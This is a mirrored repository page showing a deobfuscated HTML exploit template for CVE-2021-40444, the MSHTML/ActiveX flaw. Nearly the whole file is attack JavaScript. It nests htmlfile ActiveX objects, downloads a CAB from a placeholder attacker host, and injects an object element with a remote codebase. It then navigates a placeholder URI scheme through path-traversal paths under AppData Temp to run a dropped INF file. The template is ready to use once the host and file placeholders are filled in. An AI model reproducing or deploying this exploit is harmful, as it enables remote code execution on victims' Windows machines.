1
0
Fork 0
mirror of https://github.com/klezVirus/CVE-2021-40444.git synced 2024-11-23 22:10:48 +00:00
CVE-2021-40444/template/cab-uri-debobfuscated1.html

70 lines
4.9 KiB
HTML

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function garbage() {
return 'garbage';
}
(function exploit() {
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
try {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
} catch (_0x1ab454) {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
}
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
iframe['contentDocument']['open']()['close']();
try {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
} catch (_0x3b004e) {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
}
htmlfile2['open']()['close']();
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
htmlfile3['open']()['close']();
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
htmlfile4['open']()['close']();
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
htmlfile5['open']()['close']();
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
, XMLHttpR = new window['XMLHttpRequest']()
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
XMLHttpRsend['call'](XMLHttpR),
htmlfile5['Script']['document']['write']('body>');
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
}());
</script>
</body>
</html>